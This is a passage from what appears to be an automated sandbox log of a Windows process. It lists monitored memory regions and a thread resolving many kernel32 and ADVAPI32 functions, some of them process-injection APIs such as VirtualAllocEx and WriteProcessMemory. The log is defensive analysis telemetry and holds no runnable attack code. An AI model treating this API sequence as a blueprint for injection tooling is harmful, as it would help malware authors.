private name = "private_0x0000000002300000" filename = "" Region: id = 1304 start_va = 0x2dc0000 end_va = 0x2dc0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002dc0000" filename = "" Region: id = 1305 start_va = 0x2300000 end_va = 0x2300fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002300000" filename = "" Region: id = 1306 start_va = 0x2320000 end_va = 0x2320fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002320000" filename = "" Region: id = 1307 start_va = 0x2300000 end_va = 0x2300fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002300000" filename = "" Region: id = 1308 start_va = 0x2dd0000 end_va = 0x2dd0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002dd0000" filename = "" Region: id = 1309 start_va = 0x31f0000 end_va = 0x31f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000031f0000" filename = "" Region: id = 1310 start_va = 0x2300000 end_va = 0x2300fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002300000" filename = "" Region: id = 1311 start_va = 0x2dd0000 end_va = 0x2dd0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002dd0000" filename = "" Region: id = 1312 start_va = 0x2300000 end_va = 0x2300fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002300000" filename = "" Region: id = 1313 start_va = 0x31e0000 end_va = 0x31e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000031e0000" filename = "" Region: id = 1314 start_va = 0x2300000 end_va = 0x2300fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002300000" filename = "" Region: id = 1315 start_va = 0x2dc0000 end_va = 0x2dc0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002dc0000" filename = "" Region: id = 1316 start_va = 0x3200000 end_va = 0x3607fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003200000" filename = "" Region: id = 1317 start_va = 0x3610000 end_va = 0x3610fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003610000" filename = "" Region: id = 1318 start_va = 0x3620000 end_va = 0x3620fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003620000" filename = "" Region: id = 1319 start_va = 0x3620000 end_va = 0x3620fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003620000" filename = "" Region: id = 1320 start_va = 0x3620000 end_va = 0x3620fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003620000" filename = "" Region: id = 1321 start_va = 0x3620000 end_va = 0x3620fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003620000" filename = "" Region: id = 1322 start_va = 0x3620000 end_va = 0x3620fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003620000" filename = "" Region: id = 1323 start_va = 0x3620000 end_va = 0x3620fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003620000" filename = "" Region: id = 1324 start_va = 0x3610000 end_va = 0x3610fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003610000" filename = "" Region: id = 1325 start_va = 0x3620000 end_va = 0x3620fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003620000" filename = "" Region: id = 1326 start_va = 0x3610000 end_va = 0x3610fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003610000" filename = "" Region: id = 1327 start_va = 0x3620000 end_va = 0x3620fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003620000" filename = "" Region: id = 1328 start_va = 0x3630000 end_va = 0x3630fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003630000" filename = "" Region: id = 1329 start_va = 0x3620000 end_va = 0x3620fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003620000" filename = "" Region: id = 1330 start_va = 0x3630000 end_va = 0x3630fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003630000" filename = "" Region: id = 1331 start_va = 0x3640000 end_va = 0x3640fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003640000" filename = "" Region: id = 1332 start_va = 0x3630000 end_va = 0x3630fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003630000" filename = "" Region: id = 1333 start_va = 0x3640000 end_va = 0x3640fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003640000" filename = "" Region: id = 1334 start_va = 0x3650000 end_va = 0x3650fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003650000" filename = "" Region: id = 1335 start_va = 0x3640000 end_va = 0x3640fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003640000" filename = "" Region: id = 1336 start_va = 0x3650000 end_va = 0x3650fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003650000" filename = "" Region: id = 1337 start_va = 0x3660000 end_va = 0x3660fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003660000" filename = "" Region: id = 1338 start_va = 0x3670000 end_va = 0x3670fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003670000" filename = "" Region: id = 1339 start_va = 0x3680000 end_va = 0x3680fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003680000" filename = "" Region: id = 1340 start_va = 0x3690000 end_va = 0x3690fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003690000" filename = "" Region: id = 1341 start_va = 0x36a0000 end_va = 0x36a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000036a0000" filename = "" Region: id = 1342 start_va = 0x3690000 end_va = 0x3690fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003690000" filename = "" Region: id = 1343 start_va = 0x36b0000 end_va = 0x36b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000036b0000" filename = "" Region: id = 1344 start_va = 0x3690000 end_va = 0x3690fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003690000" filename = "" Region: id = 1345 start_va = 0x36a0000 end_va = 0x36a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000036a0000" filename = "" Region: id = 1346 start_va = 0x3690000 end_va = 0x3690fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003690000" filename = "" Region: id = 1347 start_va = 0x36c0000 end_va = 0x36c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000036c0000" filename = "" Region: id = 1348 start_va = 0x3690000 end_va = 0x3690fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003690000" filename = "" Region: id = 1349 start_va = 0x36d0000 end_va = 0x36d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000036d0000" filename = "" Region: id = 1350 start_va = 0x3690000 end_va = 0x3690fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003690000" filename = "" Region: id = 1351 start_va = 0x36e0000 end_va = 0x36e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000036e0000" filename = "" Region: id = 1352 start_va = 0x36f0000 end_va = 0x36f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000036f0000" filename = "" Region: id = 1353 start_va = 0x3700000 end_va = 0x3700fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003700000" filename = "" Region: id = 1354 start_va = 0x3710000 end_va = 0x3710fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003710000" filename = "" Region: id = 1355 start_va = 0x3720000 end_va = 0x3720fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003720000" filename = "" Region: id = 1356 start_va = 0x3730000 end_va = 0x3730fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003730000" filename = "" Region: id = 1357 start_va = 0x72420000 end_va = 0x7256afff monitored = 0 entry_point = 0x72481660 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\SysWOW64\\propsys.dll" (normalized: "c:\\windows\\syswow64\\propsys.dll") Region: id = 1358 start_va = 0x3740000 end_va = 0x3743fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 1359 start_va = 0x3750000 end_va = 0x3794fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000005.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000005.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000005.db") Region: id = 1360 start_va = 0x37a0000 end_va = 0x37a3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 1361 start_va = 0x37b0000 end_va = 0x383dfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db") Region: id = 1362 start_va = 0x3840000 end_va = 0x3c3afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003840000" filename = "" Region: id = 1363 start_va = 0x3c40000 end_va = 0x3c43fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.1.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db") Region: id = 1364 start_va = 0x3c50000 end_va = 0x3c66fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000000d.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000d.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000000d.db") Region: id = 1365 start_va = 0x3c70000 end_va = 0x3c70fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003c70000" filename = "" Region: id = 1366 start_va = 0x3c80000 end_va = 0x3cbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003c80000" filename = "" Region: id = 1367 start_va = 0x3cc0000 end_va = 0x3dbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cc0000" filename = "" Region: id = 1368 start_va = 0x3dc0000 end_va = 0x3dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003dc0000" filename = "" Region: id = 1369 start_va = 0x3e00000 end_va = 0x3efffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003e00000" filename = "" Region: id = 1370 start_va = 0x3f00000 end_va = 0x3f3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003f00000" filename = "" Region: id = 1371 start_va = 0x3f40000 end_va = 0x403ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003f40000" filename = "" Region: id = 1372 start_va = 0x4040000 end_va = 0x407ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004040000" filename = "" Region: id = 1373 start_va = 0x4080000 end_va = 0x417ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004080000" filename = "" Region: id = 1374 start_va = 0x4180000 end_va = 0x41bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004180000" filename = "" Region: id = 1375 start_va = 0x41c0000 end_va = 0x42bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041c0000" filename = "" Region: id = 1376 start_va = 0x3c40000 end_va = 0x3c40fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003c40000" filename = "" Region: id = 1389 start_va = 0x71cb0000 end_va = 0x71cc5fff monitored = 0 entry_point = 0x71cb21d0 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\SysWOW64\\mpr.dll" (normalized: "c:\\windows\\syswow64\\mpr.dll") Region: id = 1402 start_va = 0x71db0000 end_va = 0x71dbbfff monitored = 0 entry_point = 0x71db4ad0 region_type = mapped_file name = "pcacli.dll" filename = "\\Windows\\SysWOW64\\pcacli.dll" (normalized: "c:\\windows\\syswow64\\pcacli.dll") Region: id = 1410 start_va = 0x42c0000 end_va = 0x42fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000042c0000" filename = "" Region: id = 1411 start_va = 0x4300000 end_va = 0x43fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004300000" filename = "" Thread: id = 19 os_tid = 0xddc [0260.001] GetProcAddress (hModule=0x74c90000, lpProcName="LoadResource") returned 0x74ca76f0 [0260.001] GetProcAddress (hModule=0x74c90000, lpProcName="LockResource") returned 0x74ca7890 [0260.001] GetProcAddress (hModule=0x74c90000, lpProcName="SizeofResource") returned 0x74ca8f80 [0260.001] GetProcAddress (hModule=0x74c90000, lpProcName="FindResourceW") returned 0x74cb2a40 [0260.002] GetProcAddress (hModule=0x74c90000, lpProcName="lstrcmpiA") returned 0x74ca7830 [0260.002] GetProcAddress (hModule=0x74c90000, lpProcName="MultiByteToWideChar") returned 0x74ca2ad0 [0260.002] GetProcAddress (hModule=0x74c90000, lpProcName="WideCharToMultiByte") returned 0x74ca3880 [0260.002] GetProcAddress (hModule=0x74c90000, lpProcName="IsDBCSLeadByte") returned 0x74cac990 [0260.002] GetProcAddress (hModule=0x74c90000, lpProcName="GetWindowsDirectoryW") returned 0x74cb5120 [0260.002] GetProcAddress (hModule=0x74c90000, lpProcName="HeapCreate") returned 0x74caa100 [0260.003] GetProcAddress (hModule=0x74c90000, lpProcName="HeapSetInformation") returned 0x74caa8e0 [0260.003] GetProcAddress (hModule=0x74c90000, lpProcName="InitOnceExecuteOnce") returned 0x75b7c2d0 [0260.003] GetProcAddress (hModule=0x74c90000, lpProcName="InitializeCriticalSection") returned 0x777ba200 [0260.003] GetProcAddress (hModule=0x74c90000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x74cb6730 [0260.003] GetProcAddress (hModule=0x74c90000, lpProcName="InitializeSListHead") returned 0x777c5f60 [0260.003] GetProcAddress (hModule=0x74c90000, lpProcName="IsDebuggerPresent") returned 0x74cab0b0 [0260.003] GetProcAddress (hModule=0x74c90000, lpProcName="IsProcessorFeaturePresent") returned 0x74ca9bf0 [0260.004] GetProcAddress (hModule=0x74c90000, lpProcName="IsValidCodePage") returned 0x74caa790 [0260.004] GetProcAddress (hModule=0x74c90000, lpProcName="IsValidLocale") returned 0x74caab40 [0260.004] GetProcAddress (hModule=0x74c90000, lpProcName="IsWow64Process") returned 0x74ca9f10 [0260.004] GetProcAddress (hModule=0x74c90000, lpProcName="K32GetPerformanceInfo") returned 0x74cd16e0 [0260.004] GetProcAddress (hModule=0x74c90000, lpProcName="K32GetProcessMemoryInfo") returned 0x74cd1740 [0260.004] GetProcAddress (hModule=0x74c90000, lpProcName="K32QueryWorkingSetEx") returned 0x74cd17c0 [0260.004] GetProcAddress (hModule=0x74c90000, lpProcName="LCMapStringW") returned 0x74ca9f30 [0260.005] GetProcAddress (hModule=0x74c90000, lpProcName="LoadLibraryExA") returned 0x74caa270 [0260.006] GetProcAddress (hModule=0x74c90000, lpProcName="LoadLibraryExW") returned 0x74ca7930 [0260.006] GetProcAddress (hModule=0x74c90000, lpProcName="LoadLibraryW") returned 0x74caa840 [0260.006] GetProcAddress (hModule=0x74c90000, lpProcName="LocalFree") returned 0x74ca79a0 [0260.006] GetProcAddress (hModule=0x74c90000, lpProcName="LockFileEx") returned 0x74cb6b90 [0260.006] GetProcAddress (hModule=0x74c90000, lpProcName="MapViewOfFile") returned 0x74ca8d60 [0260.006] GetProcAddress (hModule=0x74c90000, lpProcName="MoveFileW") returned 0x74cab1d0 [0260.006] GetProcAddress (hModule=0x74c90000, lpProcName="OpenProcess") returned 0x74ca8bf0 [0260.007] GetProcAddress (hModule=0x74c90000, lpProcName="OutputDebugStringA") returned 0x74cafde0 [0260.007] GetProcAddress (hModule=0x74c90000, lpProcName="OutputDebugStringW") returned 0x74cd19a0 [0260.007] GetProcAddress (hModule=0x74c90000, lpProcName="PeekNamedPipe") returned 0x74cd19b0 [0260.008] GetProcAddress (hModule=0x74c90000, lpProcName="PostQueuedCompletionStatus") returned 0x74caa880 [0260.008] GetProcAddress (hModule=0x74c90000, lpProcName="ProcessIdToSessionId") returned 0x74ca8fa0 [0260.008] GetProcAddress (hModule=0x74c90000, lpProcName="QueryDosDeviceW") returned 0x74cb6ba0 [0260.008] GetProcAddress (hModule=0x74c90000, lpProcName="QueryPerformanceCounter") returned 0x74ca38a0 [0260.008] GetProcAddress (hModule=0x74c90000, lpProcName="QueryPerformanceFrequency") returned 0x74ca8cc0 [0260.008] GetProcAddress (hModule=0x74c90000, lpProcName="QueryThreadCycleTime") returned 0x74caf2e0 [0260.008] GetProcAddress (hModule=0x74c90000, lpProcName="ReadConsoleW") returned 0x74cb6fe0 [0260.009] GetProcAddress (hModule=0x74c90000, lpProcName="ReadFile") returned 0x74cb6bb0 [0260.009] GetProcAddress (hModule=0x74c90000, lpProcName="ReadProcessMemory") returned 0x74cd1c80 [0260.009] GetProcAddress (hModule=0x74c90000, lpProcName="RegisterWaitForSingleObject") returned 0x74ca9f70 [0260.009] GetProcAddress (hModule=0x74c90000, lpProcName="ReleaseSRWLockExclusive") returned 0x777ad080 [0260.009] GetProcAddress (hModule=0x74c90000, lpProcName="ReleaseSemaphore") returned 0x74cb67b0 [0260.009] GetProcAddress (hModule=0x74c90000, lpProcName="RemoveDirectoryW") returned 0x74cb6bf0 [0260.009] GetProcAddress (hModule=0x74c90000, lpProcName="ReplaceFileW") returned 0x74cb4f60 [0260.010] GetProcAddress (hModule=0x74c90000, lpProcName="ResetEvent") returned 0x74cb67c0 [0260.010] GetProcAddress (hModule=0x74c90000, lpProcName="ResumeThread") returned 0x74caa800 [0260.010] GetProcAddress (hModule=0x74c90000, lpProcName="RtlCaptureContext") returned 0x74cb6290 [0260.010] GetProcAddress (hModule=0x74c90000, lpProcName="RtlCaptureStackBackTrace") returned 0x74cacc80 [0260.010] GetProcAddress (hModule=0x74c90000, lpProcName="RtlUnwind") returned 0x74ca8c10 [0260.010] GetProcAddress (hModule=0x74c90000, lpProcName="SearchPathW") returned 0x74cae790 [0260.011] GetProcAddress (hModule=0x74c90000, lpProcName="SetConsoleCtrlHandler") returned 0x74cb6ff0 [0260.011] GetProcAddress (hModule=0x74c90000, lpProcName="SetCurrentDirectoryW") returned 0x74cafb20 [0260.011] GetProcAddress (hModule=0x74c90000, lpProcName="SetEndOfFile") returned 0x74cb6c00 [0260.011] GetProcAddress (hModule=0x74c90000, lpProcName="SetEnvironmentVariableW") returned 0x74cae9e0 [0260.011] GetProcAddress (hModule=0x74c90000, lpProcName="SetFileAttributesW") returned 0x74cb6c20 [0260.011] GetProcAddress (hModule=0x74c90000, lpProcName="SetFilePointerEx") returned 0x74cb6c50 [0260.011] GetProcAddress (hModule=0x74c90000, lpProcName="SetHandleInformation") returned 0x74cb6660 [0260.011] GetProcAddress (hModule=0x74c90000, lpProcName="SetInformationJobObject") returned 0x74cdbd30 [0260.012] GetProcAddress (hModule=0x74c90000, lpProcName="SetNamedPipeHandleState") returned 0x74cd2390 [0260.012] GetProcAddress (hModule=0x74c90000, lpProcName="SetProcessShutdownParameters") returned 0x74cafd70 [0260.012] GetProcAddress (hModule=0x74c90000, lpProcName="SetStdHandle") returned 0x74cd2430 [0260.012] GetProcAddress (hModule=0x74c90000, lpProcName="SetThreadPriority") returned 0x74ca9990 [0260.012] GetProcAddress (hModule=0x74c90000, lpProcName="SetUnhandledExceptionFilter") returned 0x74caa940 [0260.012] GetProcAddress (hModule=0x74c90000, lpProcName="SignalObjectAndWait") returned 0x74cd25e0 [0260.012] GetProcAddress (hModule=0x74c90000, lpProcName="SleepConditionVariableSRW") returned 0x75bf7fb0 [0260.013] GetProcAddress (hModule=0x74c90000, lpProcName="SleepEx") returned 0x74cb67f0 [0260.013] GetProcAddress (hModule=0x74c90000, lpProcName="GetModuleHandleA") returned 0x74ca99f0 [0260.013] GetProcAddress (hModule=0x74c90000, lpProcName="GetProcAddress") returned 0x74ca78b0 [0260.013] GetProcAddress (hModule=0x74c90000, lpProcName="SystemTimeToTzSpecificLocalTime") returned 0x74cb5c30 [0260.013] GetProcAddress (hModule=0x74c90000, lpProcName="TerminateJobObject") returned 0x74cdbf40 [0260.013] GetProcAddress (hModule=0x74c90000, lpProcName="TerminateProcess") returned 0x74cb5100 [0260.013] GetProcAddress (hModule=0x74c90000, lpProcName="TlsAlloc") returned 0x74caa120 [0260.013] GetProcAddress (hModule=0x74c90000, lpProcName="TlsFree") returned 0x74caa040 [0260.014] GetProcAddress (hModule=0x74c90000, lpProcName="TlsGetValue") returned 0x74ca1b70 [0260.014] GetProcAddress (hModule=0x74c90000, lpProcName="TlsSetValue") returned 0x74ca29d0 [0260.014] GetProcAddress (hModule=0x74c90000, lpProcName="TransactNamedPipe") returned 0x74cd2600 [0260.014] GetProcAddress (hModule=0x74c90000, lpProcName="TryAcquireSRWLockExclusive") returned 0x77783650 [0260.014] GetProcAddress (hModule=0x74c90000, lpProcName="UnhandledExceptionFilter") returned 0x74cd2670 [0260.014] GetProcAddress (hModule=0x74c90000, lpProcName="UnlockFileEx") returned 0x74cb6c90 [0260.014] GetProcAddress (hModule=0x74c90000, lpProcName="UnmapViewOfFile") returned 0x74ca9b20 [0260.014] GetProcAddress (hModule=0x74c90000, lpProcName="UnregisterWaitEx") returned 0x74caf310 [0260.015] GetProcAddress (hModule=0x74c90000, lpProcName="VirtualAllocEx") returned 0x74cd2730 [0260.015] GetProcAddress (hModule=0x74c90000, lpProcName="VirtualFree") returned 0x74ca7600 [0260.015] GetProcAddress (hModule=0x74c90000, lpProcName="VirtualFreeEx") returned 0x74cd2750 [0260.015] GetProcAddress (hModule=0x74c90000, lpProcName="VirtualProtectEx") returned 0x74cd2790 [0260.015] GetProcAddress (hModule=0x74c90000, lpProcName="VirtualQuery") returned 0x74ca7a90 [0260.015] GetProcAddress (hModule=0x74c90000, lpProcName="VirtualQueryEx") returned 0x74cd27b0 [0260.015] GetProcAddress (hModule=0x74c90000, lpProcName="WaitForSingleObject") returned 0x74cb6820 [0260.015] GetProcAddress (hModule=0x74c90000, lpProcName="WaitForSingleObjectEx") returned 0x74cb6830 [0260.015] GetProcAddress (hModule=0x74c90000, lpProcName="WaitNamedPipeW") returned 0x74cb5e70 [0260.016] GetProcAddress (hModule=0x74c90000, lpProcName="WakeAllConditionVariable") returned 0x777c8d70 [0260.016] GetProcAddress (hModule=0x74c90000, lpProcName="Wow64GetThreadContext") returned 0x74cd3e30 [0260.016] GetProcAddress (hModule=0x74c90000, lpProcName="WriteConsoleW") returned 0x74cb7020 [0260.016] GetProcAddress (hModule=0x74c90000, lpProcName="WriteFile") returned 0x74cb6ca0 [0260.016] GetProcAddress (hModule=0x74c90000, lpProcName="WriteProcessMemory") returned 0x74cd2850 [0260.016] GetProcAddress (hModule=0x74c90000, lpProcName="lstrlenW") returned 0x74ca3690 [0260.016] GetProcAddress (hModule=0x74c90000, lpProcName="GetModuleFileNameA") returned 0x74caa720 [0260.016] GetProcAddress (hModule=0x74c90000, lpProcName="CreateFileW") returned 0x74cb6890 [0260.016] GetProcAddress (hModule=0x74c90000, lpProcName="GetConsoleMode") returned 0x74cb6f70 [0260.017] GetProcAddress (hModule=0x74c90000, lpProcName="GetConsoleCP") returned 0x74cb6f60 [0260.017] GetProcAddress (hModule=0x74c90000, lpProcName="FlushFileBuffers") returned 0x74cb69b0 [0260.017] GetProcAddress (hModule=0x74c90000, lpProcName="GetStringTypeW") returned 0x74ca7950 [0260.017] GetProcAddress (hModule=0x74c90000, lpProcName="FindResourceExW") returned 0x74ca8ca0 [0260.017] GetProcAddress (hModule=0x74c90000, lpProcName="FreeEnvironmentStringsW") returned 0x74caa7e0 [0260.017] GetProcAddress (hModule=0x74c90000, lpProcName="GetEnvironmentStringsW") returned 0x74caaac0 [0260.017] GetProcAddress (hModule=0x74c90000, lpProcName="GetCommandLineW") returned 0x74caaba0 [0260.017] GetProcAddress (hModule=0x74c90000, lpProcName="GetCPInfo") returned 0x74caa290 [0260.017] GetProcAddress (hModule=0x74c90000, lpProcName="GetOEMCP") returned 0x74cb5140 [0260.018] GetProcAddress (hModule=0x74c90000, lpProcName="FindNextFileA") returned 0x74cb6980 [0260.018] GetProcAddress (hModule=0x74c90000, lpProcName="FindFirstFileExA") returned 0x74cb6930 [0260.018] GetProcAddress (hModule=0x74c90000, lpProcName="FindClose") returned 0x74cb68e0 [0260.018] GetProcAddress (hModule=0x74c90000, lpProcName="GetFileType") returned 0x74cb6aa0 [0260.018] GetProcAddress (hModule=0x74c90000, lpProcName="GetACP") returned 0x74ca8500 [0260.018] GetProcAddress (hModule=0x74c90000, lpProcName="GetStdHandle") returned 0x74caa6e0 [0260.018] GetProcAddress (hModule=0x74c90000, lpProcName="GetModuleHandleExW") returned 0x74caa2b0 [0260.018] GetProcAddress (hModule=0x74c90000, lpProcName="ExitProcess") returned 0x74cb7b30 [0260.018] GetProcAddress (hModule=0x74c90000, lpProcName="GetSystemInfo") returned 0x74caa0f0 [0260.018] GetProcAddress (hModule=0x74c90000, lpProcName="FreeLibrary") returned 0x74ca9f50 [0260.018] GetProcAddress (hModule=0x74c90000, lpProcName="GetSystemTimeAsFileTime") returned 0x74ca7620 [0260.019] GetProcAddress (hModule=0x74c90000, lpProcName="GetCurrentProcessId") returned 0x74ca23e0 [0260.019] GetProcAddress (hModule=0x74c90000, lpProcName="GetStartupInfoW") returned 0x74caa740 [0260.019] GetProcAddress (hModule=0x74c90000, lpProcName="CreateEventW") returned 0x74cb66b0 [0260.019] GetProcAddress (hModule=0x74c90000, lpProcName="CloseHandle") returned 0x74cb6630 [0260.019] GetProcAddress (hModule=0x74c90000, lpProcName="GetCurrentProcess") returned 0x74ca38c0 [0260.019] GetProcAddress (hModule=0x74c90000, lpProcName="EncodePointer") returned 0x777bf730 [0260.019] GetProcAddress (hModule=0x74c90000, lpProcName="SwitchToThread") returned 0x74caa690 [0260.019] GetProcAddress (hModule=0x74c90000, lpProcName="GetModuleHandleW") returned 0x74ca9bc0 [0260.019] GetProcAddress (hModule=0x74c90000, lpProcName="VirtualProtect") returned 0x74ca7a50 [0260.020] GetProcAddress (hModule=0x74c90000, lpProcName="VirtualAlloc") returned 0x74ca7810 [0260.020] GetProcAddress (hModule=0x74c90000, lpProcName="GetCurrentThreadId") returned 0x74ca1b90 [0260.020] GetProcAddress (hModule=0x74c90000, lpProcName="Sleep") returned 0x74ca7990 [0260.020] GetProcAddress (hModule=0x74c90000, lpProcName="SetEvent") returned 0x74cb67d0 [0260.020] GetProcAddress (hModule=0x74c90000, lpProcName="DeleteCriticalSection") returned 0x777b0e60 [0260.020] GetProcAddress (hModule=0x74c90000, lpProcName="InitializeCriticalSectionEx") returned 0x74cb6740 [0260.020] GetProcAddress (hModule=0x74c90000, lpProcName="LeaveCriticalSection") returned 0x7779f210 [0260.020] GetProcAddress (hModule=0x74c90000, lpProcName="EnterCriticalSection") returned 0x7779f290 [0260.020] GetProcAddress (hModule=0x74c90000, lpProcName="GetProcessHeap") returned 0x74ca7710 [0260.020] GetProcAddress (hModule=0x74c90000, lpProcName="HeapSize") returned 0x7778bb20 [0260.020] GetProcAddress (hModule=0x74c90000, lpProcName="HeapFree") returned 0x74ca1ba0 [0260.021] GetProcAddress (hModule=0x74c90000, lpProcName="HeapReAlloc") returned 0x7778efe0 [0260.021] GetProcAddress (hModule=0x74c90000, lpProcName="HeapAlloc") returned 0x77792bd0 [0260.021] GetProcAddress (hModule=0x74c90000, lpProcName="HeapDestroy") returned 0x74cb4c30 [0260.021] GetProcAddress (hModule=0x74c90000, lpProcName="SetLastError") returned 0x74ca2af0 [0260.021] GetProcAddress (hModule=0x74c90000, lpProcName="GetLastError") returned 0x74ca3870 [0260.021] GetProcAddress (hModule=0x74c90000, lpProcName="RaiseException") returned 0x74ca8c20 [0260.021] GetProcAddress (hModule=0x74c90000, lpProcName="DecodePointer") returned 0x777bd830 [0260.021] GetProcAddress (hModule=0x74c90000, lpProcName="SuspendThread") returned 0x74caef60 [0260.021] GetProcAddress (hModule=0x74c90000, lpProcName="GetCommandLineA") returned 0x74caab60 [0260.022] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x75830000 [0260.022] GetProcAddress (hModule=0x75830000, lpProcName="SetThreadToken") returned 0x75840f50 [0260.022] GetProcAddress (hModule=0x75830000, lpProcName="SetSecurityInfo") returned 0x758505f0 [0260.022] GetProcAddress (hModule=0x75830000, lpProcName="SetKernelObjectSecurity") returned 0x75852d10 [0260.022] GetProcAddress (hModule=0x75830000, lpProcName="SetEntriesInAclW") returned 0x75852bf0 [0260.022] GetProcAddress (hModule=0x75830000, lpProcName="RevertToSelf") returned 0x7584fc20 [0260.022] GetProcAddress 